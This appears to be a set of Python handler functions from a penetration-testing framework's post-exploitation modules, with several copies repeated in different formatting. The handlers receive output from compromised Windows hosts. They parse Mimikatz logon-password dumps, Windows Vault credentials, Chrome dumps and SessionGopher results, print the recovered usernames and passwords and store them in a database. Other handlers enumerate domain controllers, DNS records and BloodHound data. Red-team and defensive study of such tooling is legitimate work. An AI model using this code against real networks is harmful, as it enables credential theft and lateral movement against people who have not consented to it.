def on_response(self, context, response): response.send_response(200) response.end_headers() length = int(response.headers.getheader('content-length')) data = response.rfile.read(length) #We've received the response, stop tracking this host response.stop_tracking_host() dc_count = 0 if len(data): buf = StringIO(data).readlines() for line in buf: if line != '\r\n' and not line.startswith('Name') and not line.startswith('---'): try: hostname, domain, ip = filter(None, line.strip().split(' ')) hostname = hostname.split('.')[0].upper() domain = domain.split('.')[0].upper() context.log.highlight('Hostname: {} Domain: {} IP: {}'.format(hostname, domain, ip)) context.db.add_computer(ip, hostname, domain, '', dc=True) dc_count += 1 except Exception: context.log.error('Error parsing Domain Controller entry') context.log.success('Added {} Domain Controllers to the database'.format(highlight(dc_count))) log_name = 'Get_NetDomainController-{}-{}.log'.format(response.client_address[0], datetime.now().strftime("%Y-%m-%d_%H%M%S")) write_log(data, log_name) context.log.info("Saved raw output to {}".format(log_name))
def on_response(self, context, response): response.send_response(200) response.end_headers() length = int(response.headers.getheader('content-length')) data = response.rfile.read(length) # We've received the response, stop tracking this host response.stop_tracking_host() if len(data): if self.command.find('sekurlsa::logonpasswords') != -1: creds = self.parse_mimikatz(data) if len(creds): for cred_set in creds: credtype, domain, username, password,_,_ = cred_set # Get the hostid from the DB hostid = context.db.get_computers(response.client_address[0])[0][0] context.db.add_credential(credtype, domain, username, password, pillaged_from=hostid) context.log.highlight('{}\\{}:{}'.format(domain, username, password)) context.log.success("Added {} credential(s) to the database".format(highlight(len(creds)))) else: context.log.highlight(data) log_name = 'Mimikatz-{}-{}.log'.format(response.client_address[0], datetime.now().strftime("%Y-%m-%d_%H%M%S")) write_log(data, log_name) context.log.info("Saved raw Mimikatz output to {}".format(log_name))
def on_response(self, context, response): response.send_response(200) response.end_headers() length = int(response.headers.getheader('content-length')) data = response.rfile.read(length) #We've received the response, stop tracking this host response.stop_tracking_host() if len(data): if self.command.find('sekurlsa::logonpasswords') != -1: creds = self.parse_mimikatz(data) if len(creds): for cred_set in creds: credtype, domain, username, password, _, _ = cred_set #Get the hostid from the DB hostid = context.db.get_computers( response.client_address[0])[0][0] context.db.add_credential(credtype, domain, username, password, hostid) context.log.highlight('{}\\{}:{}'.format( domain, username, password)) context.log.success( "Added {} credential(s) to the database".format( highlight(len(creds)))) else: context.log.highlight(data) log_name = 'Mimikatz-{}-{}.log'.format( response.client_address[0], datetime.now().strftime("%Y-%m-%d_%H%M%S")) write_log(data, log_name) context.log.info( "Saved raw Mimikatz output to {}".format(log_name))
def on_response(self, context, response): response.send_response(200) response.end_headers() length = int(response.headers.getheader('content-length')) data = response.rfile.read(length) #We've received the response, stop tracking this host response.stop_tracking_host() dc_count = 0 if len(data): buf = StringIO(data).readlines() for line in buf: if line != '\r\n' and not line.startswith('Name') and not line.startswith('---'): try: hostname, domain, ip = filter(None, line.strip().split(' ')) hostname = hostname.split('.')[0].upper() domain = domain.split('.')[0].upper() context.log.highlight('Hostname: {} Domain: {} IP: {}'.format(hostname, domain, ip)) context.db.add_computer(ip, hostname, domain, '', dc=True) dc_count += 1 except Exception: context.log.error('Error parsing Domain Controller entry') context.log.success('Added {} Domain Controllers to the database'.format(highlight(dc_count))) log_name = 'Get_NetDomainController-{}-{}.log'.format(response.client_address[0], datetime.now().strftime("%Y-%m-%d_%H%M%S")) write_log(data, log_name) context.log.info("Saved raw output to {}".format(log_name))
def parse_ouput(self, data, context, response): ''' Parse the output from Invoke-BloodHound ''' parsedData = data.split("!-!") nameList = ['user_sessions', 'group_membership.csv', 'acls.csv', 'local_admins.csv', 'trusts.csv'] for x in range(0, len(parsedData)): if "ComputerName" in parsedData[x] and "UserName" in parsedData[x] : log_name = '{}-{}-{}.csv'.format(nameList[0], response.client_address[0], datetime.now().strftime("%Y-%m-%d_%H%M%S")) write_log(parsedData[x].replace('" "', '"\n"').replace(' "', '"'), log_name) context.log.info("Saved csv output to {}".format(log_name)) elif "GroupName" in parsedData[x] and "AccountName" in parsedData[x] : log_name = '{}-{}-{}.csv'.format(nameList[1], response.client_address[0], datetime.now().strftime("%Y-%m-%d_%H%M%S")) write_log(parsedData[x].replace('" "', '"\n"').replace(' "', '"'), log_name) context.log.info("Saved csv output to {}".format(log_name)) elif "ComputerName" in parsedData[x] and "AccountName" in parsedData[x] : log_name = '{}-{}-{}.csv'.format(nameList[3], response.client_address[0], datetime.now().strftime("%Y-%m-%d_%H%M%S")) write_log(parsedData[x].replace('" "', '"\n"').replace(' "', '"'), log_name) context.log.info("Saved csv output to {}".format(log_name)) elif "SourceDomain" in parsedData[x] and "TrustType" in parsedData[x] : log_name = '{}-{}-{}.csv'.format(nameList[4], response.client_address[0], datetime.now().strftime("%Y-%m-%d_%H%M%S")) write_log(parsedData[x].replace('" "', '"\n"').replace(' "', '"'), log_name) context.log.info("Saved csv output to {}".format(log_name)) elif "ObjectName" in parsedData[x] and "ObjectType" in parsedData[x] : log_name = '{}-{}-{}.csv'.format(nameList[2], response.client_address[0], datetime.now().strftime("%Y-%m-%d_%H%M%S")) write_log(parsedData[x].replace('" "', '"\n"').replace(' "', '"'), log_name) context.log.info("Saved csv output to {}".format(log_name))
def call_cmd_args(self): for k, v in vars(self.args).items(): if hasattr(self, k) and hasattr(getattr(self, k), '__call__'): if v is not False and v is not None: logging.debug('Calling {}()'.format(k)) r = getattr(self, k)() if self.export: write_log(str(r), self.export[0])
def parse_ouput(self, data, context, response): ''' Parse the output from Invoke-BloodHound ''' parsedData = data.split("!-!") nameList = [ 'user_sessions', 'group_membership.csv', 'acls.csv', 'local_admins.csv', 'trusts.csv' ] for x in range(0, len(parsedData)): if "ComputerName" in parsedData[x] and "UserName" in parsedData[x]: log_name = '{}-{}-{}.csv'.format( nameList[0], response.client_address[0], datetime.now().strftime("%Y-%m-%d_%H%M%S")) write_log( parsedData[x].replace('" "', '"\n"').replace(' "', '"'), log_name) context.log.info("Saved csv output to {}".format(log_name)) elif "GroupName" in parsedData[x] and "AccountName" in parsedData[ x]: log_name = '{}-{}-{}.csv'.format( nameList[1], response.client_address[0], datetime.now().strftime("%Y-%m-%d_%H%M%S")) write_log( parsedData[x].replace('" "', '"\n"').replace(' "', '"'), log_name) context.log.info("Saved csv output to {}".format(log_name)) elif "ComputerName" in parsedData[ x] and "AccountName" in parsedData[x]: log_name = '{}-{}-{}.csv'.format( nameList[3], response.client_address[0], datetime.now().strftime("%Y-%m-%d_%H%M%S")) write_log( parsedData[x].replace('" "', '"\n"').replace(' "', '"'), log_name) context.log.info("Saved csv output to {}".format(log_name)) elif "SourceDomain" in parsedData[x] and "TrustType" in parsedData[ x]: log_name = '{}-{}-{}.csv'.format( nameList[4], response.client_address[0], datetime.now().strftime("%Y-%m-%d_%H%M%S")) write_log( parsedData[x].replace('" "', '"\n"').replace(' "', '"'), log_name) context.log.info("Saved csv output to {}".format(log_name)) elif "ObjectName" in parsedData[x] and "ObjectType" in parsedData[ x]: log_name = '{}-{}-{}.csv'.format( nameList[2], response.client_address[0], datetime.now().strftime("%Y-%m-%d_%H%M%S")) write_log( parsedData[x].replace('" "', '"\n"').replace(' "', '"'), log_name) context.log.info("Saved csv output to {}".format(log_name))
def on_admin_login(self, context, connection): data = [] cards = connection.wmi(f"select DNSDomainSuffixSearchOrder, IPAddress from win32_networkadapterconfiguration") for c in cards: if c['IPAddress'].get('value'): context.log.success(f"IP Address: {c['IPAddress']['value']}\tSearch Domain: {c['DNSDomainSuffixSearchOrder']['value']}") data.append(cards) log_name = 'network-connections-{}-{}.log'.format(connection.args.target[0], datetime.now().strftime("%Y-%m-%d_%H%M%S")) write_log(json.dumps(data), log_name) context.log.info("Saved raw output to {}".format(log_name))
def on_response(self, context, response): response.send_response(200) response.end_headers() length = int(response.headers.getheader('content-length')) data = response.rfile.read(length) #We've received the response, stop tracking this host response.stop_tracking_host() if len(data): buf = StringIO(data).readlines() creds = [] try: i = 0 while i < len(buf): if ('Ressource' in buf[i]): url = buf[i].split(':', 1)[1].strip().replace( '[STRING]', '') user = buf[i + 1].split(':', 1)[1].strip().replace( '[STRING]', '') passw = buf[i + 4].split(':', 1)[1].strip().replace( '[STRING]', '') if '[BYTE*]' not in passw: creds.append({ 'url': url, 'user': user, 'passw': passw }) i += 1 except: context.log.error( 'Error parsing Mimikatz output, please check log file manually for possible credentials' ) if creds: context.log.success('Found saved Vault credentials:') for cred in creds: if cred['user'] and cred['passw']: context.log.highlight('URL: ' + cred['url']) context.log.highlight('Username: '******'user']) context.log.highlight('Password: '******'passw']) context.log.highlight('') log_name = 'EnumVaultCreds-{}-{}.log'.format( response.client_address[0], datetime.now().strftime("%Y-%m-%d_%H%M%S")) write_log(data, log_name) context.log.info("Saved Mimikatz's output to {}".format(log_name))
def on_response(self, context, response): response.send_response(200) response.end_headers() length = int(response.headers.getheader('content-length')) data = response.rfile.read(length) #We've received the response, stop tracking this host response.stop_tracking_host() if len(data): def print_post_data(data): buf = StringIO(data.strip()).readlines() for line in buf: context.log.highlight(line.strip()) print_post_data(data) log_name = 'SessionGopher-{}-{}.log'.format(response.client_address[0], datetime.now().strftime("%Y-%m-%d_%H%M%S")) write_log(data, log_name) context.log.info("Saved output to {}".format(log_name))
def on_response(self, context, response): response.send_response(200) response.end_headers() length = int(response.headers.get('content-length')) data = response.rfile.read(length).decode() #We've received the response, stop tracking this host response.stop_tracking_host() if len(data): buf = StringIO(data).readlines() for line in buf: context.log.highlight(line) log_name = 'ChromeDump-{}-{}.log'.format( response.client_address[0], datetime.now().strftime("%Y-%m-%d_%H%M%S")) write_log(data, log_name) context.log.info( "Saved raw Get-ChromeDump output to {}".format(log_name))
def on_admin_login(self, context, connection): if not self.domains: domains = [] output = connection.wmi('Select Name FROM MicrosoftDNS_Zone', 'root\\microsoftdns') if output: for result in output: domains.append(result['Name']['value']) context.log.success('Domains retrieved: {}'.format(domains)) else: domains = [self.domains] data = "" for domain in domains: output = connection.wmi('Select TextRepresentation FROM MicrosoftDNS_ResourceRecord WHERE DomainName = "{}"'.format(domain), 'root\\microsoftdns') if output: domain_data = {} context.log.highlight("Results for {}".format(domain)) data += "Results for {}\n".format(domain) for entry in output: text = entry['TextRepresentation']['value'] rname = text.split(' ')[0] rtype = text.split(' ')[2] rvalue = ' '.join(text.split(' ')[3:]) if domain_data.get(rtype, False): domain_data[rtype].append("{}: {}".format(rname, rvalue)) else: domain_data[rtype] = ["{}: {}".format(rname, rvalue)] for k, v in sorted(domain_data.items()): context.log.highlight("Record Type: {}".format(k)) data += "Record Type: {}\n".format(k) for d in sorted(v): context.log.highlight("\t"+d) data += "\t" + d + "\n" log_name = 'DNS-Enum-{}-{}.log'.format(connection.args.target[0], datetime.now().strftime("%Y-%m-%d_%H%M%S")) write_log(data, log_name) context.log.info("Saved raw output to {}".format(log_name))
def on_admin_login(self, context, connection): if not self.domains: domains = [] output = connection.wmi('Select Name FROM MicrosoftDNS_Zone', 'root\\microsoftdns') if output: for result in output: domains.append(result['Name']['value']) context.log.success('Domains retrieved: {}'.format(domains)) else: domains = [self.domains] data = "" for domain in domains: output = connection.wmi('Select TextRepresentation FROM MicrosoftDNS_ResourceRecord WHERE DomainName = "{}"'.format(domain), 'root\\microsoftdns') if output: domain_data = {} context.log.highlight("Results for {}".format(domain)) data += "Results for {}\n".format(domain) for entry in output: text = entry['TextRepresentation']['value'] rname = text.split(' ')[0] rtype = text.split(' ')[2] rvalue = ' '.join(text.split(' ')[3:]) if domain_data.get(rtype, False): domain_data[rtype].append("{}: {}".format(rname, rvalue)) else: domain_data[rtype] = ["{}: {}".format(rname, rvalue)] for k, v in sorted(domain_data.iteritems()): context.log.highlight("Record Type: {}".format(k)) data += "Record Type: {}\n".format(k) for d in sorted(v): context.log.highlight("\t"+d) data += "\t" + d + "\n" log_name = 'DNS-Enum-{}-{}.log'.format(connection.args.target[0], datetime.now().strftime("%Y-%m-%d_%H%M%S")) write_log(data, log_name) context.log.info("Saved raw output to {}".format(log_name))
def on_response(self, context, response): response.send_response(200) response.end_headers() length = int(response.headers.getheader('content-length')) data = response.rfile.read(length) #We've received the response, stop tracking this host response.stop_tracking_host() if len(data): buf = StringIO(data).readlines() for line in buf: context.log.highlight(line) log_name = 'ChromeDump-{}-{}.log'.format(response.client_address[0], datetime.now().strftime("%Y-%m-%d_%H%M%S")) write_log(data, log_name) context.log.info("Saved raw Get-ChromeDump output to {}".format(log_name)) #def on_shutdown(self, context): #context.info('Removing SQLite assembly file') #connection.ps_execute('')
def on_response(self, context, response): response.send_response(200) response.end_headers() length = int(response.headers.getheader('content-length')) data = response.rfile.read(length) #We've received the response, stop tracking this host response.stop_tracking_host() if len(data): buf = StringIO(data).readlines() creds = [] try: i = 0 while i < len(buf): if ('Ressource' in buf[i]): url = buf[i].split(':', 1)[1].strip().replace('[STRING]', '') user = buf[i+1].split(':', 1)[1].strip().replace('[STRING]', '') passw = buf[i+4].split(':', 1)[1].strip().replace('[STRING]', '') if '[BYTE*]' not in passw: creds.append({'url': url, 'user': user, 'passw': passw}) i += 1 except: context.log.error('Error parsing Mimikatz output, please check log file manually for possible credentials') if creds: context.log.success('Found saved Vault credentials:') for cred in creds: if cred['user'] and cred['passw']: context.log.highlight('URL: ' + cred['url']) context.log.highlight('Username: '******'user']) context.log.highlight('Password: '******'passw']) context.log.highlight('') log_name = 'EnumVaultCreds-{}-{}.log'.format(response.client_address[0], datetime.now().strftime("%Y-%m-%d_%H%M%S")) write_log(data, log_name) context.log.info("Saved Mimikatz's output to {}".format(log_name))
def on_response(self, context, response): response.send_response(200) response.end_headers() length = int(response.headers.get('content-length')) data = response.rfile.read(length).decode('UTF-8', 'ignore') response.stop_tracking_host() if len(data): def print_post_data(data): buf = StringIO(data.strip()).readlines() for line in buf: context.log.highlight(line.strip()) print_post_data(data) log_name = 'execute_assembly-{}-{}.log'.format( response.client_address[0], datetime.now().strftime("%Y-%m-%d_%H%M%S")) write_log(data, log_name) context.log.info("Saved output to {}".format(log_name))